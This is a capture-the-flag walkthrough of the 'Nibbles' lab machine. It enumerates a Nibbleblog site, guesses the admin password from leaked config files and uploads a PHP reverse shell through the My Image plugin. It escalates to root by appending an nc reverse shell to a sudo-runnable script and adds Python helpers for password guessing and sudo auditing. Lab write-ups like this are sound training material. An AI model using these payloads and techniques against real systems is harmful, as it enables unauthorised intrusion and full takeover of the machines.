Nibbles
External Enumeration
Nmap
nmap -sV --open -oA nibbles_initial_scan 10.129.200.170
nmap -sV --script=http-enum -oA nibbles_nmap_http_enum 10.129.200.170
Banners
nc -nv 10.129.200.170 22
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2
nc -nv 10.129.200.170 80
(UNKNOWN) [10.129.200.170] 80 (http) open
whatweb 10.129.200.170
http://10.129.200.170 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.200.170]
HTTP (80)
Curl
curl http://10.129.200.170
<b>Hello world!</b>
<!-- /nibbleblog/ directory. Nothing interesting here! -->
Directory
gobuster dir -u http://10.129.200.170/nibbleblog/ --wordlist /usr/share/dirb/wordlists/common.txt -t 60
/.hta (Status: 403) [Size: 304]
/.htaccess (Status: 403) [Size: 309]
/admin (Status: 301) [Size: 327] [--> http://10.129.200.170/nibbleblog/admin/]
/admin.php (Status: 200) [Size: 1401]
/.htpasswd (Status: 403) [Size: 309]
/content (Status: 301) [Size: 329] [--> http://10.129.200.170/nibbleblog/content/]
/index.php (Status: 200) [Size: 2987]
/languages (Status: 301) [Size: 331] [--> http://10.129.200.170/nibbleblog/languages/]
/plugins (Status: 301) [Size: 329] [--> http://10.129.200.170/nibbleblog/plugins/]
/README (Status: 200) [Size: 4628]
/themes (Status: 301) [Size: 328] [--> http://10.129.200.170/nibbleblog/themes/]
Checking ReadMe File
curl http://10.129.200.170/nibbleblog/README
Version: v4.0.3
- Nibbleblog 4.0.3 has a known authenticated arbitrary file upload through the "My Image" plugin: a logged-in admin can upload PHP that lands under content/private/plugins/my_image/. All that is missing is a valid admin login.
- The content/ tree is served without authentication, and content/private/ holds the blog's XML state files, so read those first
curl -s http://10.129.200.170/nibbleblog/content/private/users.xml | xmllint --format -
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<users>
  <user username="admin">
    <id type="integer">0</id>
    <session_fail_count type="integer">0</session_fail_count>
    <session_date type="integer">1514544131</session_date>
  </user>
  <blacklist type="string" ip="10.10.10.1">
    <date type="integer">1512964659</date>
    <fail_count type="integer">1</fail_count>
  </blacklist>
</users>
- This gives us username=admin
- Note session_fail_count and the blacklist entry with its own fail_count: the application tracks failed logins per user and per source IP and blacklists offenders, so brute forcing admin.php is likely to lock us out. Guess from what the site leaks instead
curl -s http://10.129.200.170/nibbleblog/content/private/config.xml | xmllint --format -
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<config>
  <name type="string">Nibbles</name>
  <slogan type="string">Yum yum</slogan>
  <footer type="string">Powered by Nibbleblog</footer>
  <advanced_post_options type="integer">0</advanced_post_options>
  <url type="string">http://10.10.10.134/nibbleblog/</url>
  <path type="string">/nibbleblog/</path>
  <items_rss type="integer">4</items_rss>
  <items_page type="integer">6</items_page>
  <language type="string">en_US</language>
  <timezone type="string">UTC</timezone>
  <timestamp_format type="string">%d %B, %Y</timestamp_format>
  <locale type="string">en_US</locale>
  <img_resize type="integer">1</img_resize>
  <img_resize_width type="integer">1000</img_resize_width>
  <img_resize_height type="integer">600</img_resize_height>
  <img_resize_quality type="integer">100</img_resize_quality>
  <img_resize_option type="string">auto</img_resize_option>
  <img_thumbnail type="integer">1</img_thumbnail>
  <img_thumbnail_width type="integer">190</img_thumbnail_width>
  <img_thumbnail_height type="integer">190</img_thumbnail_height>
  <img_thumbnail_quality type="integer">100</img_thumbnail_quality>
  <img_thumbnail_option type="string">landscape</img_thumbnail_option>
  <theme type="string">simpler</theme>
  <notification_comments type="integer">1</notification_comments>
  <notification_session_fail type="integer">0</notification_session_fail>
  <notification_session_start type="integer">0</notification_session_start>
  <notification_email_to type="string">admin@nibbles.com</notification_email_to>
  <notification_email_from type="string">noreply@10.10.10.134</notification_email_from>
  <seo_site_title type="string">Nibbles - Yum yum</seo_site_title>
  <seo_site_description type="string"/>
  <seo_keywords type="string"/>
  <seo_robots type="string"/>
  <seo_google_code type="string"/>
  <seo_bing_code type="string"/>
  <seo_author type="string"/>
  <friendly_urls type="integer">0</friendly_urls>
  <default_homepage type="integer">0</default_homepage>
</config>
- "Nibbles" is the site name and shows up throughout the config (name, seo_site_title, the admin mailbox at nibbles.com). With no other leads and a lockout mechanism in play, try it lowercased before anything else
- admin:nibbles logs in at /nibbleblog/admin.php
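The two curl | xmllint steps above can be scripted so the same files are checked on any Nibbleblog install. The Python below is an added example, not part of this writeup or of Nibbleblog: it pulls usernames and lockout state out of users.xml and turns every string-typed value in config.xml into an ordered list of password candidates, which reproduces the "nibbles" guess. The embedded XML is a constructed (trimmed) copy of what the box served so the script runs offline; fetch_xml() is my own helper showing the equivalent live request and is not called here.

```python
# Added example (not from the original writeup): mine Nibbleblog's unauthenticated
# content/private/*.xml files for a username and password candidates.
import re
import urllib.request
import xml.etree.ElementTree as ET

# Constructed copies of the files the target served (config.xml trimmed to the
# string-typed values that matter for guessing).
USERS_XML = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<users>
  <user username="admin">
    <id type="integer">0</id>
    <session_fail_count type="integer">0</session_fail_count>
    <session_date type="integer">1514544131</session_date>
  </user>
  <blacklist type="string" ip="10.10.10.1">
    <date type="integer">1512964659</date>
    <fail_count type="integer">1</fail_count>
  </blacklist>
</users>"""

CONFIG_XML = b"""<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<config>
  <name type="string">Nibbles</name>
  <slogan type="string">Yum yum</slogan>
  <footer type="string">Powered by Nibbleblog</footer>
  <url type="string">http://10.10.10.134/nibbleblog/</url>
  <notification_email_to type="string">admin@nibbles.com</notification_email_to>
  <seo_site_title type="string">Nibbles - Yum yum</seo_site_title>
</config>"""


def fetch_xml(base, name):
    """Live equivalent (hypothetical helper, not called here):
    GET {base}/content/private/{name}, e.g. base='http://10.129.200.170/nibbleblog'."""
    with urllib.request.urlopen(f"{base}/content/private/{name}", timeout=10) as resp:
        return resp.read()


def parse_users(xml_bytes):
    """Return ([(username, failed_logins)], [(blacklisted_ip, fail_count)]).
    A non-zero counter or an existing blacklist entry means lockout is active."""
    root = ET.fromstring(xml_bytes)
    users = [(u.get("username"), int(u.findtext("session_fail_count", "0")))
             for u in root.findall("user")]
    blacklist = [(b.get("ip"), int(b.findtext("fail_count", "0")))
                 for b in root.findall("blacklist")]
    return users, blacklist


def candidate_passwords(xml_bytes, min_len=4):
    """Split every string-typed config value into words; return lowercased,
    de-duplicated candidates in document order, so the site name comes first."""
    root = ET.fromstring(xml_bytes)
    seen, out = set(), []
    for el in root.iter():
        if el.get("type") != "string" or not el.text:
            continue
        for word in re.findall(r"[A-Za-z0-9]+", el.text):
            w = word.lower()
            if len(w) >= min_len and w not in seen:
                seen.add(w)
                out.append(w)
    return out


if __name__ == "__main__":
    users, blacklist = parse_users(USERS_XML)
    print("users:", users)
    print("blacklisted:", blacklist)
    print("candidates:", candidate_passwords(CONFIG_XML))
```

Try the candidates one at a time by hand and stop at the first hit; the blacklist returned by parse_users() is the reason not to feed this list to a brute forcer.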
Gain initial foothold into system
Log in at http://10.129.200.170/nibbleblog/admin.php as admin:nibbles → Plugins → configure "My Image"
- Upload a file named image.php with this reverse shell as its content (the plugin stores the upload under content/private/plugins/my_image/ and keeps the .php extension, so Apache will execute it):
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.7 4444 >/tmp/f"); ?>
- Start a listener on the attacking box (10.10.16.7), then request the uploaded file to trigger it
nc -nvlp 4444
curl http://10.129.200.170/nibbleblog/content/private/plugins/my_image/image.php
- The shell comes back as user nibbler
cat user.txt
Escalate Privileges
- nibbler's home directory holds personal.zip; unpack it and read the script inside
unzip personal.zip
cat personal/stuff/monitor.sh
- Serve LinEnum.sh from the attacking box and pull it onto the target (wget does not set the exec bit, so chmod it before running)
python3 -m http.server
wget http://<ip>:8000/LinEnum.sh
chmod +x LinEnum.sh && ./LinEnum.sh
[+] We can sudo without supplying a password!
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
[+] Possible sudo pwnage!
/home/nibbler/personal/stuff/monitor.sh
- The rule runs monitor.sh as root with no password, but the script lives inside nibbler's own home, so we can edit it. Append a second reverse shell (different port so it does not collide with the first listener):
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.7 4445 >/tmp/f' | tee -a /home/nibbler/personal/stuff/monitor.sh
- Catch it on the attacking box, then run the script through sudo
nc -nvlp 4445
sudo /home/nibbler/personal/stuff/monitor.sh
cat /root/root.txt
Alt Method
msfconsole
search nibbleblog
use exploit/multi/http/nibbleblog_file_upload
show options
set RHOSTS 10.129.200.170
set USERNAME admin
set PASSWORD nibbles
set TARGETURI /nibbleblog
set LHOST 10.10.16.7
set payload generic/shell_reverse_tcp
exploit
- Same "My Image" plugin upload as the manual route, just automated; the module still needs the admin creds recovered above
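LinEnum's "Possible sudo pwnage!" line in the Escalate Privileges section is worth turning into a systematic check, since the same pattern (a NOPASSWD command the user can edit, swap out or create) comes up on most boxes. The Python below is an added example, not part of this writeup or of LinEnum: it parses sudo -l text and gives a verdict for each NOPASSWD command. The embedded SUDO_L is a constructed copy of the output shown above; demo(), the temp-dir paths and the verdict names are my own.

```python
# Added example (not from the original writeup): classify every NOPASSWD command
# in `sudo -l` output by how the current user could tamper with it. monitor.sh
# on Nibbles is the "writable" case that the tee -a append exploits.
import os
import re
import tempfile

# Constructed copy of the sudo -l output LinEnum reported on the box.
SUDO_L = """Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
"""

# "(runas) NOPASSWD: /path/one arg, /path/two": one rule, possibly several commands
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s+NOPASSWD:\s*(?P<cmds>.+)$")


def nopasswd_commands(sudo_output):
    """Return (run_as, command_path) for every NOPASSWD rule, arguments dropped."""
    found = []
    for line in sudo_output.splitlines():
        m = RULE.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd:
                found.append((m.group("runas"), cmd.split()[0]))
    return found


def _nearest_existing_dir(path):
    """Walk up from path's parent to the first directory that exists."""
    d = os.path.dirname(path) or "."
    while not os.path.exists(d):
        d = os.path.dirname(d) or "."
    return d


def classify(path):
    """writable:    we can edit the file in place (the Nibbles case)
    replaceable: file is read-only but its directory is writable, so it can be
                 moved aside and recreated
    creatable:   file is absent and we can create it (sudo runs whatever appears)
    missing:     file is absent and we cannot create it
    ok:          none of the above"""
    if not os.path.exists(path):
        return "creatable" if os.access(_nearest_existing_dir(path), os.W_OK) else "missing"
    if os.access(path, os.W_OK):
        return "writable"
    if os.access(os.path.dirname(path) or ".", os.W_OK):
        return "replaceable"
    return "ok"


def audit(sudo_output):
    """(run_as, path, verdict) for every NOPASSWD command in the sudo -l text."""
    return [(runas, path, classify(path)) for runas, path in nopasswd_commands(sudo_output)]


def demo():
    """Offline run: a scratch script we own (stands in for monitor.sh) plus a path
    under a not-yet-existing subdirectory, fed through audit() as one constructed rule."""
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, "monitor.sh")
        with open(script, "w") as f:
            f.write("#!/bin/bash\necho monitoring\n")
        ghost = os.path.join(d, "stuff", "gone.sh")
        rules = ("User nibbler may run the following commands on Nibbles:\n"
                 f"    (root) NOPASSWD: {script}, {ghost}\n")
        return [verdict for _, _, verdict in audit(rules)]


if __name__ == "__main__":
    # On the box the monitor.sh line comes back "writable"; elsewhere the path is absent.
    for runas, path, verdict in audit(SUDO_L):
        print(f"{runas:8} {verdict:12} {path}")
    print(demo())
```

Feed it `sudo -l` output from the target (or LinEnum's copy of it); anything other than "ok" is a candidate for the same append-a-shell trick used against monitor.sh, with "replaceable" and "creatable" meaning you write a fresh script at that path instead of editing one.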